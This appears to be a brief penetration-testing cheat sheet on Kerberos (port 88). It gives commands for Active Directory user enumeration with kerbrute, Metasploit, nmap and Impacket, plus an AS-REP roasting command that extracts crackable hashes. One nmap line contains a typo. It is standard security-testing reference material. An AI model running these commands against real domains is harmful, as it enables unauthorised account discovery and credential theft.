Kerberos
Port 88
Domain User Enumeration
https://github.com/ropnop/kerbrute
./kerbrute_linux_amd64 userenum --dc <IP> -d <domain> usernames.txt
#Metasploit
use auxiliary/gather/kerberos_enumusers
set TIMEOUT 20
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/usernames.txt <IP>
#Authenticated | Impacket
GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
nmap --script krb5-enum-users --script args krb5-enum-users.realm=domain_name
#Impacket
GetNPUsers.py -dc-ip 172.31.3.9 spray.csl/ -usersfile names.txt -outputfile NPNUsers_output -format john
Last updated